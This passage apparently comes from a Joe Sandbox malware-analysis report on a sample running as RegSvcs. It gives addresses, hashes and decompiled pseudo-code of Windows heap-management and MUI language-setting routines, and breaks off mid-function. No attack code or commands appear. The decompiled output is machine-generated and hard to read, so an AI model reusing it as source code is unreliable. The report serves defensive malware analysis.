                                          0x0131a5cb
                                          0x0131a5cd
                                          0x013621a9
                                          0x0131a5d3
                                          0x0131a5d3
                                          0x0131a5d3
                                          0x0131a5d5
                                          0x0131a5d8
                                          0x013621b3
                                          0x013621bc
                                          0x013621c2
                                          0x013621cd
                                          0x013621cf
                                          0x013621da
                                          0x013621da
                                          0x013621da
                                          0x013621f7
                                          0x013621f7
                                          0x013621c2
                                          0x0131a5de
                                          0x0131a5e3
                                          0x0131a5e8
                                          0x0131a5ea
                                          0x0136220a
                                          0x0131a5f0
                                          0x0131a5f0
                                          0x0131a5f0
                                          0x0131a5f2
                                          0x0131a5f5
                                          0x01362219
                                          0x0136221b
                                          0x0136208c
                                          0x0136208c
                                          0x0136208c
                                          0x01362095
                                          0x01362096
                                          0x01362097
                                          0x01362098
                                          0x013620a4
                                          0x013620a5
                                          0x013620a9
                                          0x013620a9
                                          0x00000000
                                          0x0131a5f5
                                          0x0131a4bf
                                          0x0131a4d3
                                          0x0131a4d8
                                          0x0131a4da
                                          0x01361ede
                                          0x01361ede
                                          0x01361ee4
                                          0x01361ee9
                                          0x00000000
                                          0x00000000
                                          0x01361f07
                                          0x00000000
                                          0x01361f07
                                          0x0131a4e0
                                          0x0131a4e5
                                          0x0131a4e7
                                          0x013620cb
                                          0x0131a4ed
                                          0x0131a4ed
                                          0x0131a4ed
                                          0x0131a4f2
                                          0x0131a4f5
                                          0x013620d5
                                          0x013620de
                                          0x013620e4
                                          0x013620f6
                                          0x013620f6
                                          0x013620e4
                                          0x0131a4fb
                                          0x00000000
                                          0x0131a4fb
                                          0x0131a4a1
                                          0x0131a4a4
                                          0x0131a4a8
                                          0x00000000
                                          0x00000000
                                          0x0131a4aa
                                          0x0131a4ac
                                          0x00000000
                                          0x00000000
                                          0x0131a4b2
                                          0x0131a4b5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0131a4b5
                                          0x0131a43a
                                          0x0131a340
                                          0x0131a346
                                          0x0131a600
                                          0x00000000
                                          0x0131a600
                                          0x0131a34f
                                          0x0131a351
                                          0x0131a358
                                          0x0131a3c6
                                          0x00000000
                                          0x0131a371
                                          0x0131a37a
                                          0x0131a37f
                                          0x0131a382
                                          0x0131a384
                                          0x0131a394
                                          0x00000000
                                          0x0131a396
                                          0x0131a399
                                          0x0131a3a7
                                          0x0131a3b0
                                          0x0131a3b4
                                          0x0131a3bb
                                          0x0131a3d2
                                          0x0131a3da
                                          0x0131a3df
                                          0x0131a3e1
                                          0x0131a3e5
                                          0x0131a3ea
                                          0x0131a3f0
                                          0x0131a3f0
                                          0x0131a3e1
                                          0x00000000
                                          0x0131a3bb
                                          0x0131a394

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 5cb851761c14fd5da3d5c3bacea7b34c8d9a1db6be109e2365e967947b2678b1
                                          • Instruction ID: a4473752ef8999fd948176b384ff5dc71dd210f4d455709bae113b9bd3e07b29
                                          • Opcode Fuzzy Hash: 5cb851761c14fd5da3d5c3bacea7b34c8d9a1db6be109e2365e967947b2678b1
                                          • Instruction Fuzzy Hash: 154212316093819FD719CF28C884B2BBBE9FF88208F04896DF5868B75AD734D941CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E0131B477(signed int __ecx, signed int* __edx) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr* _v16;
                                          				signed int* _v20;
                                          				signed int _v24;
                                          				char _v28;
                                          				signed int _v44;
                                          				char _v48;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t131;
                                          				signed char _t134;
                                          				signed int _t139;
                                          				void* _t141;
                                          				signed int* _t143;
                                          				signed int* _t144;
                                          				intOrPtr* _t147;
                                          				char _t160;
                                          				signed int* _t163;
                                          				signed char* _t164;
                                          				intOrPtr _t165;
                                          				signed int* _t167;
                                          				signed char* _t168;
                                          				intOrPtr _t193;
                                          				intOrPtr* _t195;
                                          				signed int _t203;
                                          				signed int _t209;
                                          				signed int _t211;
                                          				intOrPtr _t214;
                                          				intOrPtr* _t231;
                                          				intOrPtr* _t236;
                                          				signed int _t237;
                                          				intOrPtr* _t238;
                                          				signed int _t240;
                                          				intOrPtr _t241;
                                          				char _t243;
                                          				signed int _t252;
                                          				signed int _t254;
                                          				signed char _t259;
                                          				signed int _t264;
                                          				signed int _t268;
                                          				intOrPtr _t277;
                                          				unsigned int _t279;
                                          				signed int* _t283;
                                          				intOrPtr* _t284;
                                          				unsigned int _t287;
                                          				signed int _t291;
                                          				signed int _t293;
                                          
                                          				_v8 =  *0x13ed360 ^ _t293;
                                          				_t223 = __edx;
                                          				_v20 = __edx;
                                          				_t291 = __ecx;
                                          				_t276 =  *__edx;
                                          				_t231 = E0131B8E4( *__edx);
                                          				_t292 = __ecx + 0x8c;
                                          				_v16 = _t231;
                                          				if(_t231 == __ecx + 0x8c) {
                                          					L38:
                                          					_t131 = 0;
                                          					L34:
                                          					return E0133B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
                                          				}
                                          				if( *0x13e8748 >= 1) {
                                          					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
                                          					if(__eflags < 0) {
                                          						_t214 =  *[fs:0x30];
                                          						__eflags =  *(_t214 + 0xc);
                                          						if( *(_t214 + 0xc) == 0) {
                                          							_push("HEAP: ");
                                          							E012FB150();
                                          						} else {
                                          							E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          						}
                                          						_push("(UCRBlock->Size >= *Size)");
                                          						E012FB150();
                                          						__eflags =  *0x13e7bc8;
                                          						if(__eflags == 0) {
                                          							__eflags = 1;
                                          							E013B2073(_t223, 1, _t291, 1);
                                          						}
                                          						_t231 = _v16;
                                          					}
                                          				}
                                          				_t5 = _t231 - 8; // -8
                                          				_t292 = _t5;
                                          				_t134 =  *((intOrPtr*)(_t292 + 6));
                                          				if(_t134 != 0) {
                                          					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                          				} else {
                                          					_t223 = _t291;
                                          				}
                                          				_t276 = _v20;
                                          				_v28 =  *((intOrPtr*)(_t231 + 0x10));
                                          				_t139 =  *(_t291 + 0xcc) ^  *0x13e8a68;
                                          				_v12 = _t139;
                                          				if(_t139 != 0) {
                                          					 *0x13eb1e0(_t291,  &_v28, _t276);
                                          					_t141 = _v12();
                                          					goto L8;
                                          				} else {
                                          					_t203 =  *((intOrPtr*)(_t231 + 0x14));
                                          					_v12 = _t203;
                                          					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
                                          						_t264 = _v12;
                                          						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
                                          						if(__eflags < 0) {
                                          							 *_t276 = _t264;
                                          						}
                                          					}
                                          					_t209 =  *(_t291 + 0x40) & 0x00040000;
                                          					asm("sbb ecx, ecx");
                                          					_t268 = ( ~_t209 & 0x0000003c) + 4;
                                          					_v12 = _t268;
                                          					if(_t209 != 0) {
                                          						_push(0);
                                          						_push(0x14);
                                          						_push( &_v48);
                                          						_push(3);
                                          						_push(_t291);
                                          						_push(0xffffffff);
                                          						_t211 = E01339730();
                                          						__eflags = _t211;
                                          						if(_t211 < 0) {
                                          							L56:
                                          							_push(_t268);
                                          							_t276 = _t291;
                                          							E013BA80D(_t291, 1, _v44, 0);
                                          							_t268 = 4;
                                          							goto L7;
                                          						}
                                          						__eflags = _v44 & 0x00000060;
                                          						if((_v44 & 0x00000060) == 0) {
                                          							goto L56;
                                          						}
                                          						__eflags = _v48 - _t291;
                                          						if(__eflags != 0) {
                                          							goto L56;
                                          						}
                                          						_t268 = _v12;
                                          					}
                                          					L7:
                                          					_push(_t268);
                                          					_push(0x1000);
                                          					_push(_v20);
                                          					_push(0);
                                          					_push( &_v28);
                                          					_push(0xffffffff);
                                          					_t141 = E01339660();
                                          					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
                                          					L8:
                                          					if(_t141 < 0) {
                                          						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
                                          						goto L38;
                                          					}
                                          					_t143 =  *( *[fs:0x30] + 0x50);
                                          					if(_t143 != 0) {
                                          						__eflags =  *_t143;
                                          						if(__eflags == 0) {
                                          							goto L10;
                                          						}
                                          						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                          						L11:
                                          						if( *_t144 != 0) {
                                          							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                                          							if(__eflags != 0) {
                                          								E013B138A(_t223, _t291, _v28,  *_v20, 2);
                                          							}
                                          						}
                                          						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
                                          							_t287 =  *(_t291 + 0x50) ^  *_t292;
                                          							 *_t292 = _t287;
                                          							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
                                          							if(_t287 >> 0x18 != _t259) {
                                          								_push(_t259);
                                          								E013AFA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
                                          							}
                                          						}
                                          						_t147 = _v16 + 8;
                                          						 *((char*)(_t292 + 2)) = 0;
                                          						 *((char*)(_t292 + 7)) = 0;
                                          						_t236 =  *((intOrPtr*)(_t147 + 4));
                                          						_t277 =  *_t147;
                                          						_v24 = _t236;
                                          						_t237 =  *_t236;
                                          						_v12 = _t237;
                                          						_t238 = _v16;
                                          						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
                                          							_push(_t238);
                                          							_push(_v12);
                                          							E013BA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
                                          							_t238 = _v16;
                                          						} else {
                                          							_t195 = _v24;
                                          							 *_t195 = _t277;
                                          							 *((intOrPtr*)(_t277 + 4)) = _t195;
                                          						}
                                          						if( *(_t238 + 0x14) == 0) {
                                          							L22:
                                          							_t223[0x30] = _t223[0x30] - 1;
                                          							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
                                          							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
                                          							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
                                          							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
                                          							_t279 =  *(_t238 + 0x14);
                                          							if(_t279 >= 0x7f000) {
                                          								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
                                          								_t279 =  *(_t238 + 0x14);
                                          							}
                                          							_t152 = _v20;
                                          							_t240 =  *_v20;
                                          							_v12 = _t240;
                                          							_t241 = _v16;
                                          							if(_t279 <= _t240) {
                                          								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
                                          								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
                                          									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
                                          									L26:
                                          									_t243 = 0;
                                          									 *((char*)(_t292 + 3)) = 0;
                                          									_t276 = _t223[0x18];
                                          									if(_t223[0x18] != _t223) {
                                          										_t160 = (_t292 - _t223 >> 0x10) + 1;
                                          										_v24 = _t160;
                                          										__eflags = _t160 - 0xfe;
                                          										if(_t160 >= 0xfe) {
                                          											_push(0);
                                          											_push(0);
                                          											E013BA80D(_t276, 3, _t292, _t223);
                                          											_t160 = _v24;
                                          										}
                                          										_t243 = _t160;
                                          									}
                                          									 *((char*)(_t292 + 6)) = _t243;
                                          									_t163 =  *( *[fs:0x30] + 0x50);
                                          									if(_t163 != 0) {
                                          										__eflags =  *_t163;
                                          										if( *_t163 == 0) {
                                          											goto L28;
                                          										}
                                          										_t227 = 0x7ffe0380;
                                          										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                          										goto L29;
                                          									} else {
                                          										L28:
                                          										_t227 = 0x7ffe0380;
                                          										_t164 = 0x7ffe0380;
                                          										L29:
                                          										if( *_t164 != 0) {
                                          											_t165 =  *[fs:0x30];
                                          											__eflags =  *(_t165 + 0x240) & 0x00000001;
                                          											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
                                          												__eflags = E01317D50();
                                          												if(__eflags != 0) {
                                          													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                          													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                          												}
                                          												_t276 = _t292;
                                          												E013B1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
                                          											}
                                          										}
                                          										_t223 = 0x7ffe038a;
                                          										_t167 =  *( *[fs:0x30] + 0x50);
                                          										if(_t167 != 0) {
                                          											__eflags =  *_t167;
                                          											if( *_t167 == 0) {
                                          												goto L31;
                                          											}
                                          											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                          											goto L32;
                                          										} else {
                                          											L31:
                                          											_t168 = _t223;
                                          											L32:
                                          											if( *_t168 != 0) {
                                          												__eflags = E01317D50();
                                          												if(__eflags != 0) {
                                          													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                          													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                          												}
                                          												_t276 = _t292;
                                          												E013B1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
                                          											}
                                          											_t131 = _t292;
                                          											goto L34;
                                          										}
                                          									}
                                          								}
                                          								_t152 = _v20;
                                          							}
                                          							E0131B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
                                          							 *_v20 =  *_v20 << 3;
                                          							goto L26;
                                          						} else {
                                          							_t283 =  *(_t291 + 0xb8);
                                          							if(_t283 != 0) {
                                          								_t190 =  *(_t238 + 0x14) >> 0xc;
                                          								while(1) {
                                          									__eflags = _t190 - _t283[1];
                                          									if(_t190 < _t283[1]) {
                                          										break;
                                          									}
                                          									_t252 =  *_t283;
                                          									__eflags = _t252;
                                          									_v24 = _t252;
                                          									_t238 = _v16;
                                          									if(_t252 == 0) {
                                          										_t190 = _t283[1] - 1;
                                          										__eflags = _t283[1] - 1;
                                          										L70:
                                          										E0131BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
                                          										_t238 = _v16;
                                          										goto L19;
                                          									}
                                          									_t283 = _v24;
                                          								}
                                          								goto L70;
                                          							}
                                          							L19:
                                          							_t193 =  *_t238;
                                          							_t284 =  *((intOrPtr*)(_t238 + 4));
                                          							_t254 =  *((intOrPtr*)(_t193 + 4));
                                          							_v24 = _t254;
                                          							_t238 = _v16;
                                          							if( *_t284 != _t254 ||  *_t284 != _t238) {
                                          								_push(_t238);
                                          								_push( *_t284);
                                          								E013BA80D(0, 0xd, _t238, _v24);
                                          								_t238 = _v16;
                                          							} else {
                                          								 *_t284 = _t193;
                                          								 *((intOrPtr*)(_t193 + 4)) = _t284;
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					L10:
                                          					_t144 = 0x7ffe0380;
                                          					goto L11;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-4253913091
                                          • Opcode ID: daf22b2f9a5eaec5e9bd14118b8209f06111efdf50e2141e3162cd1eaf6c8491
                                          • Instruction ID: a5c1f13092eb60c25f4a32090f31e35ba6fe0b39e3898c151f27424c987d5476
                                          • Opcode Fuzzy Hash: daf22b2f9a5eaec5e9bd14118b8209f06111efdf50e2141e3162cd1eaf6c8491
                                          • Instruction Fuzzy Hash: 67E1AD3060020ADFDB19CF68C894BBEBBB9FF48308F1485A9E5069B799D774E941CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E01303D34(signed int* __ecx) {
                                          				signed int* _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				signed int* _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int* _v48;
                                          				signed int* _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				signed int _t140;
                                          				signed int _t161;
                                          				signed int* _t236;
                                          				signed int* _t242;
                                          				signed int* _t243;
                                          				signed int* _t244;
                                          				signed int* _t245;
                                          				signed int _t255;
                                          				void* _t257;
                                          				signed int _t260;
                                          				void* _t262;
                                          				signed int _t264;
                                          				void* _t267;
                                          				signed int _t275;
                                          				signed int* _t276;
                                          				short* _t277;
                                          				signed int* _t278;
                                          				signed int* _t279;
                                          				signed int* _t280;
                                          				short* _t281;
                                          				signed int* _t282;
                                          				short* _t283;
                                          				signed int* _t284;
                                          				void* _t285;
                                          
                                          				_v60 = _v60 | 0xffffffff;
                                          				_t280 = 0;
                                          				_t242 = __ecx;
                                          				_v52 = __ecx;
                                          				_v8 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v28 = 0;
                                          				_v32 = 0;
                                          				_v44 = 0;
                                          				_v56 = 0;
                                          				_t275 = 0;
                                          				_v16 = 0;
                                          				if(__ecx == 0) {
                                          					_t280 = 0xc000000d;
                                          					_t140 = 0;
                                          					L50:
                                          					 *_t242 =  *_t242 | 0x00000800;
                                          					_t242[0x13] = _t140;
                                          					_t242[0x16] = _v40;
                                          					_t242[0x18] = _v28;
                                          					_t242[0x14] = _v32;
                                          					_t242[0x17] = _t275;
                                          					_t242[0x15] = _v44;
                                          					_t242[0x11] = _v56;
                                          					_t242[0x12] = _v60;
                                          					return _t280;
                                          				}
                                          				if(E01301B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                          					}
                                          					_v8 = _t280;
                                          				}
                                          				if(E01301B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v60 =  *_v8;
                                          					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                          					_v8 = _t280;
                                          				}
                                          				if(E01301B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          					L16:
                                          					if(E01301B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          						L28:
                                          						if(E01301B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                          							L46:
                                          							_t275 = _v16;
                                          							L47:
                                          							_t161 = 0;
                                          							L48:
                                          							if(_v8 != 0) {
                                          								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                          							}
                                          							_t140 = _v20;
                                          							if(_t140 != 0) {
                                          								if(_t275 != 0) {
                                          									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                          									_t275 = 0;
                                          									_v28 = 0;
                                          									_t140 = _v20;
                                          								}
                                          							}
                                          							goto L50;
                                          						}
                                          						_t167 = _v12;
                                          						_t255 = _v12 + 4;
                                          						_v44 = _t255;
                                          						if(_t255 == 0) {
                                          							_t276 = _t280;
                                          							_v32 = _t280;
                                          						} else {
                                          							_t276 = L01314620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                          							_t167 = _v12;
                                          							_v32 = _t276;
                                          						}
                                          						if(_t276 == 0) {
                                          							_v44 = _t280;
                                          							_t280 = 0xc0000017;
                                          							goto L46;
                                          						} else {
                                          							E0133F3E0(_t276, _v8, _t167);
                                          							_v48 = _t276;
                                          							_t277 = E01341370(_t276, 0x12d4e90);
                                          							_pop(_t257);
                                          							if(_t277 == 0) {
                                          								L38:
                                          								_t170 = _v48;
                                          								if( *_v48 != 0) {
                                          									E0133BB40(0,  &_v68, _t170);
                                          									if(L013043C0( &_v68,  &_v24) != 0) {
                                          										_t280 =  &(_t280[0]);
                                          									}
                                          								}
                                          								if(_t280 == 0) {
                                          									_t280 = 0;
                                          									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                          									_v44 = 0;
                                          									_v32 = 0;
                                          								} else {
                                          									_t280 = 0;
                                          								}
                                          								_t174 = _v8;
                                          								if(_v8 != 0) {
                                          									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                          								}
                                          								_v8 = _t280;
                                          								goto L46;
                                          							}
                                          							_t243 = _v48;
                                          							do {
                                          								 *_t277 = 0;
                                          								_t278 = _t277 + 2;
                                          								E0133BB40(_t257,  &_v68, _t243);
                                          								if(L013043C0( &_v68,  &_v24) != 0) {
                                          									_t280 =  &(_t280[0]);
                                          								}
                                          								_t243 = _t278;
                                          								_t277 = E01341370(_t278, 0x12d4e90);
                                          								_pop(_t257);
                                          							} while (_t277 != 0);
                                          							_v48 = _t243;
                                          							_t242 = _v52;
                                          							goto L38;
                                          						}
                                          					}
                                          					_t191 = _v12;
                                          					_t260 = _v12 + 4;
                                          					_v28 = _t260;
                                          					if(_t260 == 0) {
                                          						_t275 = _t280;
                                          						_v16 = _t280;
                                          					} else {
                                          						_t275 = L01314620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                          						_t191 = _v12;
                                          						_v16 = _t275;
                                          					}
                                          					if(_t275 == 0) {
                                          						_v28 = _t280;
                                          						_t280 = 0xc0000017;
                                          						goto L47;
                                          					} else {
                                          						E0133F3E0(_t275, _v8, _t191);
                                          						_t285 = _t285 + 0xc;
                                          						_v48 = _t275;
                                          						_t279 = _t280;
                                          						_t281 = E01341370(_v16, 0x12d4e90);
                                          						_pop(_t262);
                                          						if(_t281 != 0) {
                                          							_t244 = _v48;
                                          							do {
                                          								 *_t281 = 0;
                                          								_t282 = _t281 + 2;
                                          								E0133BB40(_t262,  &_v68, _t244);
                                          								if(L013043C0( &_v68,  &_v24) != 0) {
                                          									_t279 =  &(_t279[0]);
                                          								}
                                          								_t244 = _t282;
                                          								_t281 = E01341370(_t282, 0x12d4e90);
                                          								_pop(_t262);
                                          							} while (_t281 != 0);
                                          							_v48 = _t244;
                                          							_t242 = _v52;
                                          						}
                                          						_t201 = _v48;
                                          						_t280 = 0;
                                          						if( *_v48 != 0) {
                                          							E0133BB40(_t262,  &_v68, _t201);
                                          							if(L013043C0( &_v68,  &_v24) != 0) {
                                          								_t279 =  &(_t279[0]);
                                          							}
                                          						}
                                          						if(_t279 == 0) {
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                          							_v28 = _t280;
                                          							_v16 = _t280;
                                          						}
                                          						_t202 = _v8;
                                          						if(_v8 != 0) {
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                          						}
                                          						_v8 = _t280;
                                          						goto L28;
                                          					}
                                          				}
                                          				_t214 = _v12;
                                          				_t264 = _v12 + 4;
                                          				_v40 = _t264;
                                          				if(_t264 == 0) {
                                          					_v20 = _t280;
                                          				} else {
                                          					_t236 = L01314620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                          					_t280 = _t236;
                                          					_v20 = _t236;
                                          					_t214 = _v12;
                                          				}
                                          				if(_t280 == 0) {
                                          					_t161 = 0;
                                          					_t280 = 0xc0000017;
                                          					_v40 = 0;
                                          					goto L48;
                                          				} else {
                                          					E0133F3E0(_t280, _v8, _t214);
                                          					_t285 = _t285 + 0xc;
                                          					_v48 = _t280;
                                          					_t283 = E01341370(_t280, 0x12d4e90);
                                          					_pop(_t267);
                                          					if(_t283 != 0) {
                                          						_t245 = _v48;
                                          						do {
                                          							 *_t283 = 0;
                                          							_t284 = _t283 + 2;
                                          							E0133BB40(_t267,  &_v68, _t245);
                                          							if(L013043C0( &_v68,  &_v24) != 0) {
                                          								_t275 = _t275 + 1;
                                          							}
                                          							_t245 = _t284;
                                          							_t283 = E01341370(_t284, 0x12d4e90);
                                          							_pop(_t267);
                                          						} while (_t283 != 0);
                                          						_v48 = _t245;
                                          						_t242 = _v52;
                                          					}
                                          					_t224 = _v48;
                                          					_t280 = 0;
                                          					if( *_v48 != 0) {
                                          						E0133BB40(_t267,  &_v68, _t224);
                                          						if(L013043C0( &_v68,  &_v24) != 0) {
                                          							_t275 = _t275 + 1;
                                          						}
                                          					}
                                          					if(_t275 == 0) {
                                          						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                          						_v40 = _t280;
                                          						_v20 = _t280;
                                          					}
                                          					_t225 = _v8;
                                          					if(_v8 != 0) {
                                          						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                          					}
                                          					_v8 = _t280;
                                          					goto L16;
                                          				}
                                          			}











































                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 01303D8C
                                          • Kernel-MUI-Language-Allowed, xrefs: 01303DC0
                                          • Kernel-MUI-Language-Disallowed, xrefs: 01303E97
                                          • Kernel-MUI-Language-SKU, xrefs: 01303F70
                                          • WindowsExcludedProcs, xrefs: 01303D6F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 2e60296a2044c69497d498322fdfd3cda965d6eedd5cabbbc41b0a04d929a44a
                                          • Instruction ID: 5e85a71e64e4f0ed85f8fdbac82da180ad99b537329e8218fc1593cb7a62ef25
                                          • Opcode Fuzzy Hash: 2e60296a2044c69497d498322fdfd3cda965d6eedd5cabbbc41b0a04d929a44a
                                          • Instruction Fuzzy Hash: A0F15B72D00619EFCB16DF99C990EEEBBF9FF48654F14406AE905A7650E7309E01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E013CE824(signed int __ecx, signed int* __edx) {
                                          				signed int _v8;
                                          				signed char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				unsigned int _v44;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t177;
                                          				signed int _t179;
                                          				unsigned int _t202;
                                          				signed char _t207;
                                          				signed char _t210;
                                          				signed int _t230;
                                          				void* _t244;
                                          				unsigned int _t247;
                                          				signed int _t288;
                                          				signed int _t289;
                                          				signed int _t291;
                                          				signed char _t293;
                                          				signed char _t295;
                                          				signed char _t298;
                                          				intOrPtr* _t303;
                                          				signed int _t310;
                                          				signed char _t316;
                                          				signed int _t319;
                                          				signed char _t323;
                                          				signed char _t330;
                                          				signed int _t334;
                                          				signed int _t337;
                                          				signed int _t341;
                                          				signed char _t345;
                                          				signed char _t347;
                                          				signed int _t353;
                                          				signed char _t354;
                                          				void* _t383;
                                          				signed char _t385;
                                          				signed char _t386;
                                          				unsigned int _t392;
                                          				signed int _t393;
                                          				signed int _t395;
                                          				signed int _t398;
                                          				signed int _t399;
                                          				signed int _t401;
                                          				unsigned int _t403;
                                          				void* _t404;
                                          				unsigned int _t405;
                                          				signed int _t406;
                                          				signed char _t412;
                                          				unsigned int _t413;
                                          				unsigned int _t418;
                                          				void* _t419;
                                          				void* _t420;
                                          				void* _t421;
                                          				void* _t422;
                                          				void* _t423;
                                          				signed char* _t425;
                                          				signed int _t426;
                                          				signed int _t428;
                                          				unsigned int _t430;
                                          				signed int _t431;
                                          				signed int _t433;
                                          
                                          				_v8 =  *0x13ed360 ^ _t433;
                                          				_v40 = __ecx;
                                          				_v16 = __edx;
